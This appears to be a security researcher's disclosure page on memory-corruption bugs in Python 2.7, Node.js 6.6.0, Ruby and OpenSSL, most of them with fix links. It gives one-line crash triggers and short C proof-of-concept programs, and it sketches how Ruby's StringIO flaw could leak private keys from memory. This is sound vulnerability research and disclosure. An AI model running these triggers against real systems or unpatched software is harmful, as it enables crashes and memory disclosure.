Python 2.7 32-bit heap corruption in JSON encoder

The ascii_escape_str and ascii_escape_unicode functions in Python 2.7 have hitherto been prone to a heap corruption vulnerability. Various paths towards these functions and triggering their the vulnerability exist, one of which is encoding a dict object with a very large key:

python -c 'import json;json.dumps({chr(0x22)*0x2AAAAAAB:0})'

A fix has been implemented: https://hg.python.org/cpython/rev/9375c8834448

Node.js memory corruption from JavaScript as a feature

Update 26 Sept 2016: a fix is being prepared at https://github.com/nodejs/node/issues/8724

As I was casually browsing the NodeJS 6.6.0 source code I stumbled upon this suspect piece of code.

src/node_buffer.cc:

 816 template <typename T, enum Endianness endianness>
 817 void WriteFloatGeneric(const FunctionCallbackInfo<Value>& args) {
 818   Environment* env = Environment::GetCurrent(args);
 819 
 820   bool should_assert = args.Length() < 4;
 821 
 822   if (should_assert) {
 823     THROW_AND_RETURN_UNLESS_BUFFER(env, args[0]);
 824   }
 825 
 826   Local<Uint8Array> ts_obj = args[0].As<Uint8Array>();
 827   ArrayBuffer::Contents ts_obj_c = ts_obj->Buffer()->GetContents();
 828   const size_t ts_obj_offset = ts_obj->ByteOffset();
 829   const size_t ts_obj_length = ts_obj->ByteLength();
 830   char* const ts_obj_data =
 831       static_cast<char*>(ts_obj_c.Data()) + ts_obj_offset;
 832   if (ts_obj_length > 0)
 833     CHECK_NE(ts_obj_data, nullptr);
 834 
 835   T val = args[1]->NumberValue(env->context()).FromMaybe(0);
 836   size_t offset = args[2]->IntegerValue(env->context()).FromMaybe(0);
 837 
 838   size_t memcpy_num = sizeof(T);
 839 
 840   if (should_assert) {
 841     CHECK_NOT_OOB(offset + memcpy_num >= memcpy_num);
 842     CHECK_NOT_OOB(offset + memcpy_num <= ts_obj_length);
 843   }
 844 
 845   if (offset + memcpy_num > ts_obj_length)
 846     memcpy_num = ts_obj_length - offset;
 847 
 848   union NoAlias {
 849     T val;
 850     char bytes[sizeof(T)];
 851   };
 852 
 853   union NoAlias na = { val };
 854   char* ptr = static_cast<char*>(ts_obj_data) + offset;
 855   if (endianness != GetEndianness())
 856     Swizzle(na.bytes, sizeof(na.bytes));
 857   memcpy(ptr, na.bytes, memcpy_num);
 858 }

As you can see, should_assert is set to false when there is a 4th parameter.

This is what the documentation says about it:

https://nodejs.org/api/buffer.html#buffer_buf_writefloatbe_value_offset_noassert

buf.writeFloatBE(value, offset[, noAssert])
#
buf.writeFloatLE(value, offset[, noAssert])
#
Added in: v0.11.15

    value <Number> Number to be written to buf
    offset <Integer> Where to start writing. Must satisfy: 0 <= offset <= buf.length - 4
    noAssert <Boolean> Skip value and offset validation? Default: false
    Return: <Integer> offset plus the number of bytes written

Writes value to buf at the specified offset with specified endian format (writeFloatBE() writes big endian, writeFloatLE() writes little endian). value should be a valid 32-bit float. Behavior is undefined when value is anything other than a 32-bit float.

Setting noAssert to true allows the encoded form of value to extend beyond the end of buf, but the result should be considered undefined behavior.

So it’s not a bug but a feature..

Let’s try it on 64 bit:

node-v6.6.0$ ./node -e 'new Buffer(10).writeFloatBE(1, 0xFFFFFFFFFFFFFFFF-3000, 1);'
Segmentation fault

Groovy!

Disclaimer: I never use NodeJS and I know next to nothing about it. Maybe there is a good use for this “feature” (but what?), but other popular high-level languages have a zero-tolerance policy with regards to raw memory corruption from scripts (see Python, Ruby, Perl, PHP vulnerabilities etc in the Internet Bug Bounty program).

Ruby vulnerability: heap corruption in string.c tr_trans() due to undersized buffer

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/cc9f1e919518edbee41d602ce215175f52f8f5f5

Configure with ASAN AddressSanitizer:

mkdir install; CFLAGS="-fsanitize=address" ./configure
--disable-install-doc --disable-install-rdoc --disable-install-capi
-prefix=`realpath ./install` && make -j4 && make install

Then execute:

$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"),
"c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...

The actual corruption occurs here:

6196     TERM_FILL(t, rb_enc_mbminlen(enc));

Ruby vulnerability: heap corruption in DateTime.strftime() on 32 bit for certain format strings

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/58e8c9c895cc21473d6e46978666016a6e627d5f

Setting a very high precision in the date_strftime_with_tmx() function,
the following check (in the STRFTIME macro in date_strftime.c) will not
work as expected if s >= 0x80000000.

124         if (start + maxsize < s + precision) {          \
125             errno = ERANGE;                 \
126             return 0;                       \
127         }

This code causes a crash on my 32 bit system:

require 'date'
DateTime.now.strftime("%2147483647c")

64 bit is probably not affected (technically possible, but
unlikely).

Ruby vulnerability: StringIO strio_getline() may divulge arbitrary process memory

Originally reported privately to Ruby on 4 Jun 2016
Testing was done on Ruby 2.3.1 in 32 bit VM
Ruby has expressly allowed me to talk publicly about this issue while a fix is being prepared

The problem is this line in ext/stringio/stringio.c strio_getline():

1002     if (limit > 0 && s + limit < e) {
1003     e = rb_enc_right_char_head(s, s + limit, e, get_enc(ptr));
1004     }

This works as intended as long as the sum of s (pointer) and limit
(long) doesn’t overflow. So if on a 32 bit system ‘s’ happens to be
0xBF000000, and limit is 0x7FFFFFFF, the sum of both values is
0x3EFFFFFF, which is a completely unrelated address. From there, there
are several paths to be chosen from based on what the first parameter to
the function is (‘str’).

  1005      if (NIL_P(str)) {
            ...
            ...
  1008      else if ((n = RSTRING_LEN(str)) == 0) {
            ...
            ...
  1024      else if (n == 1) {
            ...
            ...
  1030      else {
            ...
            ...

All these paths eventually call strio_substr(). A wrong ‘pos’ parameter
to this function is not possible because it was checked earlier:

   996      if (ptr->pos >= (n = RSTRING_LEN(ptr->string))) {
   997      return Qnil;
   998      }

a wrong len parameter to this function doesn’t matter as it will
correct it itself:

    98  static VALUE
    99  strio_substr(struct StringIO *ptr, long pos, long len)
   100  {
   101      VALUE str = ptr->string;
   102      rb_encoding *enc = get_enc(ptr);
   103      long rlen = RSTRING_LEN(str) - pos;
   104  
   105      if (len > rlen) len = rlen;
   106      if (len < 0) len = 0;
   107      if (len == 0) return rb_str_new(0,0);
   108      return rb_enc_str_new(RSTRING_PTR(str)+pos, len, enc);
   109  }

As for the first path (str is nil, line 1005), it will call
strio_substr() with an invalid len value, which doesn’t matter because
strio_substr() corrects it:

  1005      if (NIL_P(str)) {
  1006      str = strio_substr(ptr, ptr->pos, e - s);
  1007      }

Within the second path (str is an empty string, line 1008), there is
the risk of an OOB read here, because this routine’s logic is based on
the belief that ‘e’ denotes the end of the buffer. ‘p’ will never become
‘e’ because either 1) a null pointer dereference will occur (once it
reads at address 0x00000000) or 2) no \n character is found before p reaches an invalid memory page. In theory an attacker could use this
mishap to find the \n character at various places in memory (by
adjusting the ‘limit’ variable), but that is usually not very useful.
(The way an attacker can know at which the \n character is found will
become clear later).

  1009      p = s;
  1010      while (*p == '\n') {
  1011          if (++p == e) {
  1012          return Qnil;
  1013          }
  1014      }
  1015      s = p;
  1016      while ((p = memchr(p, '\n', e - p)) && (p != e)) {
  1017          if (*++p == '\n') {
  1018          e = p + 1;
  1019          break;
  1020          }
  1021      }
  1022      str = strio_substr(ptr, s - RSTRING_PTR(ptr->string), e - s);

The third path (str is 1 character large, line 1024) is similar to the
second path except that memchr is used to find the desired character:

  1025      if ((p = memchr(s, RSTRING_PTR(str)[0], e - s)) != 0) {
  1026          e = p + 1;
  1027      }
  1028      str = strio_substr(ptr, ptr->pos, e - s);

The fourth path is entered if str is 2 or more bytes large (line
1030). The first condition is always true if a very high ‘limit’ value
is chosen (the premise of this vulnerability):

  1031      if (n < e - s) {

The first subpath is never true in this case:

  1032          if (e - s < 1024) {

So the second subpath is entered. This can be used to find the arbitrary
string str across the totality of virtual memory:

  1040          else {
  1041          long skip[1 << CHAR_BIT], pos;
  1042          p = RSTRING_PTR(str);
  1043          bm_init_skip(skip, p, n);
  1044          if ((pos = bm_search(p, n, s, e - s, skip)) >= 0) {
  1045              e = s + pos + n;
  1046          }
  1047          }

After any of these paths have been traversed, the attacker can read the
pos attribute to get the relative location of the string that has been
found somewhere in memory:

  1051      ptr->pos = e - RSTRING_PTR(ptr->string);

By subtracting this current pos from the previous pos the attacker
can know the position of string that was searched for relative to the
base string.

My hypothesis is that, if we assume that the attacker can control the
‘limit’ variable as well as the string that has to be searched for and
they can invoke strio_getline an arbitrary number of times, they can
make Ruby divulge arbitrary information such as private keys (if they
are loaded in memory), by searching for BEGIN PGP PRIVATE KEY BLOCK
and adjust the limit parameter in combination with all alphanumeric
characters to deduce the entire base64-encoded private key.

Note that a pointer address can naturally be very high (on 32 bit
anyway), such as 0xFFFF0000. In that event, a limit of 0x10000 can be
enough to overflow this computation:

1002     if (limit > 0 && s + limit < e) {

Here is code that can be used to trigger the vulnerability.

require "stringio"
s = StringIO.new
s.puts("abc")
s.rewind()
x = s.gets('xxx', 0x7FFFFFF0)
puts(s.pos)

The vulnerability is more likely to trigger on 32 bit than on 64 bit,
since on 32 bit, the chance that the base string is allocated beyond the
half of the virtual address space (0x80000000 or above, like 0xBF000000
in my initial example) than on 64 bit (where it needs to be allocated at
0x8000000000000000 or above). I did all of my testing on 32 bit.

OpenSSL X509_NAME_oneline memory corruption issues

Mem corruption due to oversized input

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 536870912;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 0x01, stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    X509_NAME_oneline(name, 0, 0);
}

Proof that X509_NAME_oneline writes to buffer despite the len parameter being 0:

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 1024;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 'x', stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    // Fictional buf ptr -- but wouldn't crash
    // if X509_NAME_oneline would adhere to the
    // fact that length is 0
    X509_NAME_oneline(name, (char*)1, 0);
}

OpenSSL: double-free after memory allocation in d2i_ASN1_bytes fails

#include <openssl/asn1.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    ASN1_STRING* a = ASN1_STRING_new();
    ASN1_STRING* b;
    unsigned char* pp;

    ASN1_STRING_set(a, "aa", -1);
    pp = malloc(0x80000000);
    if ( !pp )
    {
        printf("Allocation failure\n");
        return 0;
    }
    pp[0] = 0x01;
    pp[1] = 0x84;
    pp[2] = 0x7F;
    pp[3] = 0xFF;
    pp[4] = 0xFF;
    pp[5] = 0xFA;
    b = d2i_ASN1_bytes(&a, (const unsigned char**)&pp, 0x80000000, 1, 0);
    ASN1_STRING_free(a);

    return 0;
}
gcc d2i_ASN1_bytes_double_free.c -lcrypto; ulimit -v 4194304; ./a.out